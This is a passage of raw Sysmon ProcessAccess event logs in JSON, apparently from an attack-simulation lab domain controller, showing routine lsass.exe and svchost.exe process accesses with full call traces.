1","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 